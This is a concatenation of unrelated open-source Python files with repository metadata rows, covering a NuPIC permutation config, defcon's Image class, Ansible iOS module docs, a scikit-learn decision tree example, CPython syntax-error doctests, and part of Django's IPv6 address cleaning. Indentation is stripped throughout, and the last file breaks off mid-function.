'timestamp_timeOfDay': PermuteEncoder(fieldName='timestamp', encoderClass='DateEncoder.timeOfDay', radius=PermuteChoices([1, 8]), w=7),
'consumption': PermuteEncoder(fieldName='consumption', encoderClass='ScalarEncoder', maxval=PermuteInt(100, 300, 25), n=PermuteInt(39, 1500, 60), w=21, minval=0),
'address': PermuteEncoder(fieldName='address', encoderClass='SDRCategoryEncoder', w=21, n=300),
},
},
'tmParams': {
'minThreshold': PermuteInt(9, 12),
'activationThreshold': PermuteInt(12, 16),
},
}
}
# Fields selected for final hypersearch report;
# NOTE: These values are used as regular expressions by RunPermutations.py's
# report generator
# (fieldname values generated from PERM_PREDICTED_FIELD_NAME)
report = [
'.*consumption.*',
]
# Permutation optimization setting: either minimize or maximize metric
# used by RunPermutations.
# NOTE: The value is used as a regular expressions by RunPermutations.py's
# report generator
# (generated from minimize = 'prediction:rmse:field=consumption')
minimize = 'prediction:rmse:field=consumption'
def permutationFilter(perm):
""" This function can be used to selectively filter out specific permutation
combinations. It is called by RunPermutations for every possible permutation
of the variables in the permutations dict. It should return True for valid a
combination of permutation values and False for an invalid one.
Parameters:
---------------------------------------------------------
perm: dict of one possible combination of name:value
pairs chosen from permutations.
"""
# An example of how to use this
if perm['modelParams']['sensorParams']['encoders']['consumption']['maxval'] > 250:
return False;
return True
| agpl-3.0 | 64,258,846,940,821,384 | 36.854167 | 170 | 0.694276 | false |
moyogo/defcon | Lib/defcon/objects/image.py | 1 | 9304 | from __future__ import absolute_import
import weakref
from defcon.objects.base import BaseDictObject
from defcon.objects.color import Color
_defaultTransformation = {
"xScale" : 1,
"xyScale" : 0,
"yxScale" : 0,
"yScale" : 1,
"xOffset" : 0,
"yOffset" : 0
}
class Image(BaseDictObject):
"""
This object represents an image reference in a glyph.
**This object posts the following notifications:**
- Image.Changed
- Image.FileNameChanged
- Image.TransformationChanged
- Image.ColorChanged
- Image.ImageDataChanged
During initialization an image dictionary, following the format defined
in the UFO spec, can be passed. If so, the new object will be populated
with the data from the dictionary.
"""
changeNotificationName = "Image.Changed"
representationFactories = {}
def __init__(self, glyph=None, imageDict=None):
self._font = None
self._layerSet = None
self._layer = None
self._glyph = None
self.glyph = glyph
super(Image, self).__init__()
self.beginSelfNotificationObservation()
self["fileName"] = None
self["color"] = None
if imageDict is not None:
self.update(imageDict)
for key, value in _defaultTransformation.items():
if self.get(key) is None:
self[key] = value
self._dirty = False
def __len__(self):
# this is a little hack for glifLib writing.
# when a GLIF is written, glyph.image is chekced with:
# if glyph.image:
# fileName is required, so if that isn't defined
# return 0. this tells glifLib to skip the image.
if self["fileName"] is None:
return 0
return super(Image, self).__len__()
# --------------
# Parent Objects
# --------------
def getParent(self):
return self.glyph
def _get_font(self):
font = None
if self._font is None:
glyph = self.glyph
if glyph is not None:
font = glyph.font
if font is not None:
self._font = weakref.ref(font)
else:
font = self._font()
return font
font = property(_get_font, doc="The :class:`Font` that this image belongs to.")
def _get_layerSet(self):
layerSet = None
if self._layerSet is None:
glyph = self.glyph
if glyph is not None:
layerSet = glyph.layerSet
if layerSet is not None:
self._layerSet = weakref.ref(layerSet)
else:
layerSet = self._layerSet()
return layerSet
layerSet = property(_get_layerSet, doc="The :class:`LayerSet` that this image belongs to.")
def _get_layer(self):
layer = None
if self._layer is None:
glyph = self.glyph
if glyph is not None:
layer = glyph.layer
if layer is not None:
self._layer = weakref.ref(layer)
else:
layer = self._layer()
return layer
layer = property(_get_layer, doc="The :class:`Layer` that this image belongs to.")
def _get_glyph(self):
if self._glyph is None:
return None
return self._glyph()
def _set_glyph(self, glyph):
assert self._glyph is None
if glyph is not None:
glyph = weakref.ref(glyph)
self._font = None
self._layerSet = None
self._layer = None
self._glyph = glyph
glyph = property(_get_glyph, _set_glyph, doc="The :class:`Glyph` that this image belongs to. This should not be set externally.")
# ----------
# Attributes
# ----------
# file name
def _get_fileName(self):
return self["fileName"]
def _set_fileName(self, fileName):
oldFileName = self.get("fileName")
if fileName == oldFileName:
return
self["fileName"] = fileName
self.postNotification("Image.FileNameChanged", data=dict(oldValue=oldFileName, newValue=fileName))
fileName = property(_get_fileName, _set_fileName, doc="The file name the image. Setting this will posts *Image.Changed* and *Image.FileNameChanged* notifications.")
# transformation
def _get_transformation(self):
if "xScale" not in self:
return
return (self["xScale"], self["xyScale"], self["yxScale"], self["yScale"], self["xOffset"], self["yOffset"])
def _set_transformation(self, transformation):
oldTransformation = self.transformation
if oldTransformation == transformation:
return
xScale, xyScale, yxScale, yScale, xOffset, yOffset = transformation
# hold the notifications so that only one is sent out
self.holdNotifications(note="Requested by Image._set_transformation.")
self["xScale"] = xScale
self["xyScale"] = xyScale
self["yxScale"] = yxScale
self["yScale"] = yScale
self["xOffset"] = xOffset
self["yOffset"] = yOffset
self.releaseHeldNotifications()
self.postNotification("Image.TransformationChanged", data=dict(oldValue=oldTransformation, newValue=transformation))
transformation = property(_get_transformation, _set_transformation, doc="The transformation matrix for the image. Setting this will posts *Image.Changed* and *Image.TransformationChanged* notifications.")
# color
def _get_color(self):
return self.get("color")
def _set_color(self, color):
if color is None:
newColor = None
else:
newColor = Color(color)
oldColor = self.get("color")
if newColor == oldColor:
return
self["color"] = newColor
self.postNotification("Image.ColorChanged", data=dict(oldValue=oldColor, newValue=newColor))
color = property(_get_color, _set_color, doc="The image's :class:`Color` object. When setting, the value can be a UFO color string, a sequence of (r, g, b, a) or a :class:`Color` object. Setting this posts *Image.ColorChanged* and *Image.Changed* notifications.")
# ----
# Move
# ----
def move(self, values):
"""
Move the image by **(x, y)**.
This posts *Image.Changed* and *Image.TransformationChanged* notifications.
"""
xOffset, yOffset = values
if not (xOffset or yOffset):
return
oldTransformation = self.transformation
self.holdNotifications(note="Requested by Image.move.")
self["xOffset"] += xOffset
self["yOffset"] += yOffset
self.releaseHeldNotifications()
self.postNotification("Image.TransformationChanged", data=dict(oldValue=oldTransformation, newValue=self.transformation))
# ------------------------
# Notification Observation
# ------------------------
def beginSelfNotificationObservation(self):
super(Image, self).beginSelfNotificationObservation()
self.beginSelfImageSetNotificationObservation()
def endSelfNotificationObservation(self):
self.endImageSetNotificationObservation()
super(Image, self).endSelfNotificationObservation()
self._font = None
self._layerSet = None
self._layer = None
self._glyph = None
def beginSelfImageSetNotificationObservation(self):
font = self.font
if font is None:
return
imageSet = font.images
imageSet.addObserver(self, "imageSetImageAddedNotificationCallback", "ImageSet.ImageAdded")
imageSet.addObserver(self, "imageSetImageDeletedNotificationCallback", "ImageSet.ImageDeleted")
imageSet.addObserver(self, "imageSetImageChangedNotificationCallback", "ImageSet.ImageChanged")
layer = self.layer
layer.addObserver(self, "layerColorChangedNotificationCallback", "Layer.ColorChanged")
def endImageSetNotificationObservation(self):
font = self.font
if font is None:
return
imageSet = font.images
imageSet.removeObserver(self, "ImageSet.ImageAdded")
imageSet.removeObserver(self, "ImageSet.ImageDeleted")
imageSet.removeObserver(self, "ImageSet.ImageChanged")
layer = self.layer
layer.removeObserver(self, "Layer.ColorChanged")
def imageSetImageAddedNotificationCallback(self, notification):
name = notification.data["name"]
if name != self.fileName:
return
self.postNotification("Image.ImageDataChanged")
def imageSetImageDeletedNotificationCallback(self, notification):
name = notification.data["name"]
if name != self.fileName:
return
self.postNotification("Image.ImageDataChanged")
def imageSetImageChangedNotificationCallback(self, notification):
name = notification.data["name"]
if name != self.fileName:
return
self.postNotification("Image.ImageDataChanged")
def layerColorChangedNotificationCallback(self, notification):
if self.color is not None:
self.postNotification("Image.ColorChanged", data=notification.data)
if __name__ == "__main__":
import doctest
doctest.testmod()
| mit | -8,821,778,087,892,059 | 33.080586 | 267 | 0.617906 | false |
britcey/ansible | lib/ansible/utils/module_docs_fragments/ios.py | 101 | 4360 | #
# (c) 2015, Peter Sprygada <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
class ModuleDocFragment(object):
# Standard files documentation fragment
DOCUMENTATION = """
options:
authorize:
description:
- Instructs the module to enter privileged mode on the remote device
before sending any commands. If not specified, the device will
attempt to execute all commands in non-privileged mode. If the value
is not specified in the task, the value of environment variable
C(ANSIBLE_NET_AUTHORIZE) will be used instead.
default: no
choices: ['yes', 'no']
auth_pass:
description:
- Specifies the password to use if required to enter privileged mode
on the remote device. If I(authorize) is false, then this argument
does nothing. If the value is not specified in the task, the value of
environment variable C(ANSIBLE_NET_AUTH_PASS) will be used instead.
default: none
provider:
description:
- A dict object containing connection details.
default: null
suboptions:
host:
description:
- Specifies the DNS host name or address for connecting to the remote
device over the specified transport. The value of host is used as
the destination address for the transport.
required: true
port:
description:
- Specifies the port to use when building the connection to the remote device.
default: 22
username:
description:
- Configures the username to use to authenticate the connection to
the remote device. This value is used to authenticate
the SSH session. If the value is not specified in the task, the
value of environment variable C(ANSIBLE_NET_USERNAME) will be used instead.
password:
description:
- Specifies the password to use to authenticate the connection to
the remote device. This value is used to authenticate
the SSH session. If the value is not specified in the task, the
value of environment variable C(ANSIBLE_NET_PASSWORD) will be used instead.
default: null
timeout:
description:
- Specifies the timeout in seconds for communicating with the network device
for either connecting or sending commands. If the timeout is
exceeded before the operation is completed, the module will error.
default: 10
ssh_keyfile:
description:
- Specifies the SSH key to use to authenticate the connection to
the remote device. This value is the path to the
key used to authenticate the SSH session. If the value is not specified
in the task, the value of environment variable C(ANSIBLE_NET_SSH_KEYFILE)
will be used instead.
authorize:
description:
- Instructs the module to enter privileged mode on the remote device
before sending any commands. If not specified, the device will
attempt to execute all commands in non-privileged mode. If the value
is not specified in the task, the value of environment variable
C(ANSIBLE_NET_AUTHORIZE) will be used instead.
default: no
choices: ['yes', 'no']
auth_pass:
description:
- Specifies the password to use if required to enter privileged mode
on the remote device. If I(authorize) is false, then this argument
does nothing. If the value is not specified in the task, the value of
environment variable C(ANSIBLE_NET_AUTH_PASS) will be used instead.
default: none
"""
| gpl-3.0 | 8,027,521,662,355,475,000 | 43.489796 | 88 | 0.674771 | false |
nikitasingh981/scikit-learn | examples/tree/plot_tree_regression_multioutput.py | 73 | 1854 | """
===================================================================
Multi-output Decision Tree Regression
===================================================================
An example to illustrate multi-output regression with decision tree.
The :ref:`decision trees <tree>`
is used to predict simultaneously the noisy x and y observations of a circle
given a single underlying feature. As a result, it learns local linear
regressions approximating the circle.
We can see that if the maximum depth of the tree (controlled by the
`max_depth` parameter) is set too high, the decision trees learn too fine
details of the training data and learn from the noise, i.e. they overfit.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn.tree import DecisionTreeRegressor
# Create a random dataset
rng = np.random.RandomState(1)
X = np.sort(200 * rng.rand(100, 1) - 100, axis=0)
y = np.array([np.pi * np.sin(X).ravel(), np.pi * np.cos(X).ravel()]).T
y[::5, :] += (0.5 - rng.rand(20, 2))
# Fit regression model
regr_1 = DecisionTreeRegressor(max_depth=2)
regr_2 = DecisionTreeRegressor(max_depth=5)
regr_3 = DecisionTreeRegressor(max_depth=8)
regr_1.fit(X, y)
regr_2.fit(X, y)
regr_3.fit(X, y)
# Predict
X_test = np.arange(-100.0, 100.0, 0.01)[:, np.newaxis]
y_1 = regr_1.predict(X_test)
y_2 = regr_2.predict(X_test)
y_3 = regr_3.predict(X_test)
# Plot the results
plt.figure()
s = 50
plt.scatter(y[:, 0], y[:, 1], c="navy", s=s, label="data")
plt.scatter(y_1[:, 0], y_1[:, 1], c="cornflowerblue", s=s, label="max_depth=2")
plt.scatter(y_2[:, 0], y_2[:, 1], c="c", s=s, label="max_depth=5")
plt.scatter(y_3[:, 0], y_3[:, 1], c="orange", s=s, label="max_depth=8")
plt.xlim([-6, 6])
plt.ylim([-6, 6])
plt.xlabel("target 1")
plt.ylabel("target 2")
plt.title("Multi-output Decision Tree Regression")
plt.legend()
plt.show()
| bsd-3-clause | -209,652,577,239,711,070 | 32.107143 | 79 | 0.638619 | false |
rubyinhell/brython | www/src/Lib/test/test_syntax.py | 87 | 18064 | """This module tests SyntaxErrors.
Here's an example of the sort of thing that is tested.
>>> def f(x):
... global x
Traceback (most recent call last):
SyntaxError: name 'x' is parameter and global
The tests are all raise SyntaxErrors. They were created by checking
each C call that raises SyntaxError. There are several modules that
raise these exceptions-- ast.c, compile.c, future.c, pythonrun.c, and
symtable.c.
The parser itself outlaws a lot of invalid syntax. None of these
errors are tested here at the moment. We should add some tests; since
there are infinitely many programs with invalid syntax, we would need
to be judicious in selecting some.
The compiler generates a synthetic module name for code executed by
doctest. Since all the code comes from the same module, a suffix like
[1] is appended to the module name, As a consequence, changing the
order of tests in this module means renumbering all the errors after
it. (Maybe we should enable the ellipsis option for these tests.)
In ast.c, syntax errors are raised by calling ast_error().
Errors from set_context():
>>> obj.None = 1
Traceback (most recent call last):
SyntaxError: invalid syntax
>>> None = 1
Traceback (most recent call last):
SyntaxError: assignment to keyword
It's a syntax error to assign to the empty tuple. Why isn't it an
error to assign to the empty list? It will always raise some error at
runtime.
>>> () = 1
Traceback (most recent call last):
SyntaxError: can't assign to ()
>>> f() = 1
Traceback (most recent call last):
SyntaxError: can't assign to function call
>>> del f()
Traceback (most recent call last):
SyntaxError: can't delete function call
>>> a + 1 = 2
Traceback (most recent call last):
SyntaxError: can't assign to operator
>>> (x for x in x) = 1
Traceback (most recent call last):
SyntaxError: can't assign to generator expression
>>> 1 = 1
Traceback (most recent call last):
SyntaxError: can't assign to literal
>>> "abc" = 1
Traceback (most recent call last):
SyntaxError: can't assign to literal
>>> b"" = 1
Traceback (most recent call last):
SyntaxError: can't assign to literal
>>> `1` = 1
Traceback (most recent call last):
SyntaxError: invalid syntax
If the left-hand side of an assignment is a list or tuple, an illegal
expression inside that contain should still cause a syntax error.
This test just checks a couple of cases rather than enumerating all of
them.
>>> (a, "b", c) = (1, 2, 3)
Traceback (most recent call last):
SyntaxError: can't assign to literal
>>> [a, b, c + 1] = [1, 2, 3]
Traceback (most recent call last):
SyntaxError: can't assign to operator
>>> a if 1 else b = 1
Traceback (most recent call last):
SyntaxError: can't assign to conditional expression
From compiler_complex_args():
>>> def f(None=1):
... pass
Traceback (most recent call last):
SyntaxError: invalid syntax
From ast_for_arguments():
>>> def f(x, y=1, z):
... pass
Traceback (most recent call last):
SyntaxError: non-default argument follows default argument
>>> def f(x, None):
... pass
Traceback (most recent call last):
SyntaxError: invalid syntax
>>> def f(*None):
... pass
Traceback (most recent call last):
SyntaxError: invalid syntax
>>> def f(**None):
... pass
Traceback (most recent call last):
SyntaxError: invalid syntax
From ast_for_funcdef():
>>> def None(x):
... pass
Traceback (most recent call last):
SyntaxError: invalid syntax
From ast_for_call():
>>> def f(it, *varargs):
... return list(it)
>>> L = range(10)
>>> f(x for x in L)
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> f(x for x in L, 1)
Traceback (most recent call last):
SyntaxError: Generator expression must be parenthesized if not sole argument
>>> f((x for x in L), 1)
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> f(i0, i1, i2, i3, i4, i5, i6, i7, i8, i9, i10, i11,
... i12, i13, i14, i15, i16, i17, i18, i19, i20, i21, i22,
... i23, i24, i25, i26, i27, i28, i29, i30, i31, i32, i33,
... i34, i35, i36, i37, i38, i39, i40, i41, i42, i43, i44,
... i45, i46, i47, i48, i49, i50, i51, i52, i53, i54, i55,
... i56, i57, i58, i59, i60, i61, i62, i63, i64, i65, i66,
... i67, i68, i69, i70, i71, i72, i73, i74, i75, i76, i77,
... i78, i79, i80, i81, i82, i83, i84, i85, i86, i87, i88,
... i89, i90, i91, i92, i93, i94, i95, i96, i97, i98, i99,
... i100, i101, i102, i103, i104, i105, i106, i107, i108,
... i109, i110, i111, i112, i113, i114, i115, i116, i117,
... i118, i119, i120, i121, i122, i123, i124, i125, i126,
... i127, i128, i129, i130, i131, i132, i133, i134, i135,
... i136, i137, i138, i139, i140, i141, i142, i143, i144,
... i145, i146, i147, i148, i149, i150, i151, i152, i153,
... i154, i155, i156, i157, i158, i159, i160, i161, i162,
... i163, i164, i165, i166, i167, i168, i169, i170, i171,
... i172, i173, i174, i175, i176, i177, i178, i179, i180,
... i181, i182, i183, i184, i185, i186, i187, i188, i189,
... i190, i191, i192, i193, i194, i195, i196, i197, i198,
... i199, i200, i201, i202, i203, i204, i205, i206, i207,
... i208, i209, i210, i211, i212, i213, i214, i215, i216,
... i217, i218, i219, i220, i221, i222, i223, i224, i225,
... i226, i227, i228, i229, i230, i231, i232, i233, i234,
... i235, i236, i237, i238, i239, i240, i241, i242, i243,
... i244, i245, i246, i247, i248, i249, i250, i251, i252,
... i253, i254, i255)
Traceback (most recent call last):
SyntaxError: more than 255 arguments
The actual error cases counts positional arguments, keyword arguments,
and generator expression arguments separately. This test combines the
three.
>>> f(i0, i1, i2, i3, i4, i5, i6, i7, i8, i9, i10, i11,
... i12, i13, i14, i15, i16, i17, i18, i19, i20, i21, i22,
... i23, i24, i25, i26, i27, i28, i29, i30, i31, i32, i33,
... i34, i35, i36, i37, i38, i39, i40, i41, i42, i43, i44,
... i45, i46, i47, i48, i49, i50, i51, i52, i53, i54, i55,
... i56, i57, i58, i59, i60, i61, i62, i63, i64, i65, i66,
... i67, i68, i69, i70, i71, i72, i73, i74, i75, i76, i77,
... i78, i79, i80, i81, i82, i83, i84, i85, i86, i87, i88,
... i89, i90, i91, i92, i93, i94, i95, i96, i97, i98, i99,
... i100, i101, i102, i103, i104, i105, i106, i107, i108,
... i109, i110, i111, i112, i113, i114, i115, i116, i117,
... i118, i119, i120, i121, i122, i123, i124, i125, i126,
... i127, i128, i129, i130, i131, i132, i133, i134, i135,
... i136, i137, i138, i139, i140, i141, i142, i143, i144,
... i145, i146, i147, i148, i149, i150, i151, i152, i153,
... i154, i155, i156, i157, i158, i159, i160, i161, i162,
... i163, i164, i165, i166, i167, i168, i169, i170, i171,
... i172, i173, i174, i175, i176, i177, i178, i179, i180,
... i181, i182, i183, i184, i185, i186, i187, i188, i189,
... i190, i191, i192, i193, i194, i195, i196, i197, i198,
... i199, i200, i201, i202, i203, i204, i205, i206, i207,
... i208, i209, i210, i211, i212, i213, i214, i215, i216,
... i217, i218, i219, i220, i221, i222, i223, i224, i225,
... i226, i227, i228, i229, i230, i231, i232, i233, i234,
... i235, i236, i237, i238, i239, i240, i241, i242, i243,
... (x for x in i244), i245, i246, i247, i248, i249, i250, i251,
... i252=1, i253=1, i254=1, i255=1)
Traceback (most recent call last):
SyntaxError: more than 255 arguments
>>> f(lambda x: x[0] = 3)
Traceback (most recent call last):
SyntaxError: lambda cannot contain assignment
The grammar accepts any test (basically, any expression) in the
keyword slot of a call site. Test a few different options.
>>> f(x()=2)
Traceback (most recent call last):
SyntaxError: keyword can't be an expression
>>> f(a or b=1)
Traceback (most recent call last):
SyntaxError: keyword can't be an expression
>>> f(x.y=1)
Traceback (most recent call last):
SyntaxError: keyword can't be an expression
More set_context():
>>> (x for x in x) += 1
Traceback (most recent call last):
SyntaxError: can't assign to generator expression
>>> None += 1
Traceback (most recent call last):
SyntaxError: assignment to keyword
>>> f() += 1
Traceback (most recent call last):
SyntaxError: can't assign to function call
Test continue in finally in weird combinations.
continue in for loop under finally should be ok.
>>> def test():
... try:
... pass
... finally:
... for abc in range(10):
... continue
... print(abc)
>>> test()
9
Start simple, a continue in a finally should not be allowed.
>>> def test():
... for abc in range(10):
... try:
... pass
... finally:
... continue
Traceback (most recent call last):
...
SyntaxError: 'continue' not supported inside 'finally' clause
This is essentially a continue in a finally which should not be allowed.
>>> def test():
... for abc in range(10):
... try:
... pass
... finally:
... try:
... continue
... except:
... pass
Traceback (most recent call last):
...
SyntaxError: 'continue' not supported inside 'finally' clause
>>> def foo():
... try:
... pass
... finally:
... continue
Traceback (most recent call last):
...
SyntaxError: 'continue' not supported inside 'finally' clause
>>> def foo():
... for a in ():
... try:
... pass
... finally:
... continue
Traceback (most recent call last):
...
SyntaxError: 'continue' not supported inside 'finally' clause
>>> def foo():
... for a in ():
... try:
... pass
... finally:
... try:
... continue
... finally:
... pass
Traceback (most recent call last):
...
SyntaxError: 'continue' not supported inside 'finally' clause
>>> def foo():
... for a in ():
... try: pass
... finally:
... try:
... pass
... except:
... continue
Traceback (most recent call last):
...
SyntaxError: 'continue' not supported inside 'finally' clause
There is one test for a break that is not in a loop. The compiler
uses a single data structure to keep track of try-finally and loops,
so we need to be sure that a break is actually inside a loop. If it
isn't, there should be a syntax error.
>>> try:
... print(1)
... break
... print(2)
... finally:
... print(3)
Traceback (most recent call last):
...
SyntaxError: 'break' outside loop
This should probably raise a better error than a SystemError (or none at all).
In 2.5 there was a missing exception and an assert was triggered in a debug
build. The number of blocks must be greater than CO_MAXBLOCKS. SF #1565514
>>> while 1:
... while 2:
... while 3:
... while 4:
... while 5:
... while 6:
... while 8:
... while 9:
... while 10:
... while 11:
... while 12:
... while 13:
... while 14:
... while 15:
... while 16:
... while 17:
... while 18:
... while 19:
... while 20:
... while 21:
... while 22:
... break
Traceback (most recent call last):
...
SystemError: too many statically nested blocks
Misuse of the nonlocal statement can lead to a few unique syntax errors.
>>> def f(x):
... nonlocal x
Traceback (most recent call last):
...
SyntaxError: name 'x' is parameter and nonlocal
>>> def f():
... global x
... nonlocal x
Traceback (most recent call last):
...
SyntaxError: name 'x' is nonlocal and global
>>> def f():
... nonlocal x
Traceback (most recent call last):
...
SyntaxError: no binding for nonlocal 'x' found
From SF bug #1705365
>>> nonlocal x
Traceback (most recent call last):
...
SyntaxError: nonlocal declaration not allowed at module level
TODO(jhylton): Figure out how to test SyntaxWarning with doctest.
## >>> def f(x):
## ... def f():
## ... print(x)
## ... nonlocal x
## Traceback (most recent call last):
## ...
## SyntaxWarning: name 'x' is assigned to before nonlocal declaration
## >>> def f():
## ... x = 1
## ... nonlocal x
## Traceback (most recent call last):
## ...
## SyntaxWarning: name 'x' is assigned to before nonlocal declaration
This tests assignment-context; there was a bug in Python 2.5 where compiling
a complex 'if' (one with 'elif') would fail to notice an invalid suite,
leading to spurious errors.
>>> if 1:
... x() = 1
... elif 1:
... pass
Traceback (most recent call last):
...
SyntaxError: can't assign to function call
>>> if 1:
... pass
... elif 1:
... x() = 1
Traceback (most recent call last):
...
SyntaxError: can't assign to function call
>>> if 1:
... x() = 1
... elif 1:
... pass
... else:
... pass
Traceback (most recent call last):
...
SyntaxError: can't assign to function call
>>> if 1:
... pass
... elif 1:
... x() = 1
... else:
... pass
Traceback (most recent call last):
...
SyntaxError: can't assign to function call
>>> if 1:
... pass
... elif 1:
... pass
... else:
... x() = 1
Traceback (most recent call last):
...
SyntaxError: can't assign to function call
Make sure that the old "raise X, Y[, Z]" form is gone:
>>> raise X, Y
Traceback (most recent call last):
...
SyntaxError: invalid syntax
>>> raise X, Y, Z
Traceback (most recent call last):
...
SyntaxError: invalid syntax
>>> f(a=23, a=234)
Traceback (most recent call last):
...
SyntaxError: keyword argument repeated
>>> del ()
Traceback (most recent call last):
SyntaxError: can't delete ()
>>> {1, 2, 3} = 42
Traceback (most recent call last):
SyntaxError: can't assign to literal
Corner-cases that used to fail to raise the correct error:
>>> def f(*, x=lambda __debug__:0): pass
Traceback (most recent call last):
SyntaxError: assignment to keyword
>>> def f(*args:(lambda __debug__:0)): pass
Traceback (most recent call last):
SyntaxError: assignment to keyword
>>> def f(**kwargs:(lambda __debug__:0)): pass
Traceback (most recent call last):
SyntaxError: assignment to keyword
>>> with (lambda *:0): pass
Traceback (most recent call last):
SyntaxError: named arguments must follow bare *
Corner-cases that used to crash:
>>> def f(**__debug__): pass
Traceback (most recent call last):
SyntaxError: assignment to keyword
>>> def f(*xx, __debug__): pass
Traceback (most recent call last):
SyntaxError: assignment to keyword
"""
import re
import unittest
import warnings
from test import support
class SyntaxTestCase(unittest.TestCase):
def _check_error(self, code, errtext,
filename="<testcase>", mode="exec", subclass=None):
"""Check that compiling code raises SyntaxError with errtext.
errtest is a regular expression that must be present in the
test of the exception raised. If subclass is specified it
is the expected subclass of SyntaxError (e.g. IndentationError).
"""
try:
compile(code, filename, mode)
except SyntaxError as err:
if subclass and not isinstance(err, subclass):
self.fail("SyntaxError is not a %s" % subclass.__name__)
mo = re.search(errtext, str(err))
if mo is None:
self.fail("SyntaxError did not contain '%r'" % (errtext,))
else:
self.fail("compile() did not raise SyntaxError")
def test_assign_call(self):
self._check_error("f() = 1", "assign")
def test_assign_del(self):
self._check_error("del f()", "delete")
def test_global_err_then_warn(self):
# Bug tickler: The SyntaxError raised for one global statement
# shouldn't be clobbered by a SyntaxWarning issued for a later one.
source = """if 1:
def error(a):
global a # SyntaxError
def warning():
b = 1
global b # SyntaxWarning
"""
warnings.filterwarnings(action='ignore', category=SyntaxWarning)
self._check_error(source, "global")
warnings.filters.pop(0)
def test_break_outside_loop(self):
self._check_error("break", "outside loop")
def test_unexpected_indent(self):
self._check_error("foo()\n bar()\n", "unexpected indent",
subclass=IndentationError)
def test_no_indent(self):
self._check_error("if 1:\nfoo()", "expected an indented block",
subclass=IndentationError)
def test_bad_outdent(self):
self._check_error("if 1:\n foo()\n bar()",
"unindent does not match .* level",
subclass=IndentationError)
def test_kwargs_last(self):
self._check_error("int(base=10, '2')", "non-keyword arg")
def test_main():
support.run_unittest(SyntaxTestCase)
from test import test_syntax
support.run_doctest(test_syntax, verbosity=True)
if __name__ == "__main__":
test_main()
| bsd-3-clause | -3,719,575,714,766,748,700 | 29.462057 | 78 | 0.582761 | false |
abhattad4/Digi-Menu | build/lib.linux-x86_64-2.7/django/utils/ipv6.py | 225 | 7971 | # This code was mostly based on ipaddr-py
# Copyright 2007 Google Inc. http://code.google.com/p/ipaddr-py/
# Licensed under the Apache License, Version 2.0 (the "License").
from django.core.exceptions import ValidationError
from django.utils.six.moves import range
from django.utils.translation import ugettext_lazy as _
def clean_ipv6_address(ip_str, unpack_ipv4=False,
error_message=_("This is not a valid IPv6 address.")):
"""
Cleans an IPv6 address string.
Validity is checked by calling is_valid_ipv6_address() - if an
invalid address is passed, ValidationError is raised.
Replaces the longest continuous zero-sequence with "::" and
removes leading zeroes and makes sure all hextets are lowercase.
Args:
ip_str: A valid IPv6 address.
unpack_ipv4: if an IPv4-mapped address is found,
return the plain IPv4 address (default=False).
error_message: An error message used in the ValidationError.
Returns:
A compressed IPv6 address, or the same value
"""
best_doublecolon_start = -1
best_doublecolon_len = 0
doublecolon_start = -1
doublecolon_len = 0
if not is_valid_ipv6_address(ip_str):
raise ValidationError(error_message, code='invalid')
# This algorithm can only handle fully exploded
# IP strings
ip_str = _explode_shorthand_ip_string(ip_str)
ip_str = _sanitize_ipv4_mapping(ip_str)
# If needed, unpack the IPv4 and return straight away
# - no need in running the rest of the algorithm
if unpack_ipv4:
ipv4_unpacked = _unpack_ipv4(ip_str)
if ipv4_unpacked:
return ipv4_unpacked
hextets = ip_str.split(":")
for index in range(len(hextets)):
# Remove leading zeroes
hextets[index] = hextets[index].lstrip('0')
if not hextets[index]:
hextets[index] = '0'
# Determine best hextet to compress
if hextets[index] == '0':
doublecolon_len += 1
if doublecolon_start == -1:
# Start of a sequence of zeros.
doublecolon_start = index
if doublecolon_len > best_doublecolon_len:
# This is the longest sequence of zeros so far.
best_doublecolon_len = doublecolon_len
best_doublecolon_start = doublecolon_start
else:
doublecolon_len = 0
doublecolon_start = -1
# Compress the most suitable hextet
if best_doublecolon_len > 1:
best_doublecolon_end = (best_doublecolon_start +
best_doublecolon_len)
# For zeros at the end of the address.
if best_doublecolon_end == len(hextets):
hextets += ['']
hextets[best_doublecolon_start:best_doublecolon_end] = ['']
# For zeros at the beginning of the address.
if best_doublecolon_start == 0:
hextets = [''] + hextets
result = ":".join(hextets)
return result.lower()
def _sanitize_ipv4_mapping(ip_str):
"""
Sanitize IPv4 mapping in an expanded IPv6 address.
This converts ::ffff:0a0a:0a0a to ::ffff:10.10.10.10.
If there is nothing to sanitize, returns an unchanged
string.
Args:
ip_str: A string, the expanded IPv6 address.
Returns:
The sanitized output string, if applicable.
"""
if not ip_str.lower().startswith('0000:0000:0000:0000:0000:ffff:'):
# not an ipv4 mapping
return ip_str
hextets = ip_str.split(':')
if '.' in hextets[-1]:
# already sanitized
return ip_str
ipv4_address = "%d.%d.%d.%d" % (
int(hextets[6][0:2], 16),
int(hextets[6][2:4], 16),
int(hextets[7][0:2], 16),
int(hextets[7][2:4], 16),
)
result = ':'.join(hextets[0:6])
result += ':' + ipv4_address
return result
def _unpack_ipv4(ip_str):
"""
Unpack an IPv4 address that was mapped in a compressed IPv6 address.
This converts 0000:0000:0000:0000:0000:ffff:10.10.10.10 to 10.10.10.10.
If there is nothing to sanitize, returns None.
Args:
ip_str: A string, the expanded IPv6 address.
Returns:
The unpacked IPv4 address, or None if there was nothing to unpack.
"""
if not ip_str.lower().startswith('0000:0000:0000:0000:0000:ffff:'):
return None
return ip_str.rsplit(':', 1)[1]
def is_valid_ipv6_address(ip_str):
"""
Ensure we have a valid IPv6 address.
Args:
ip_str: A string, the IPv6 address.
Returns:
A boolean, True if this is a valid IPv6 address.
"""
from django.core.validators import validate_ipv4_address
# We need to have at least one ':'.
if ':' not in ip_str:
return False
# We can only have one '::' shortener.
if ip_str.count('::') > 1:
return False
# '::' should be encompassed by start, digits or end.
if ':::' in ip_str:
return False
# A single colon can neither start nor end an address.
if ((ip_str.startswith(':') and not ip_str.startswith('::')) or
(ip_str.endswith(':') and not ip_str.endswith('::'))):
return False
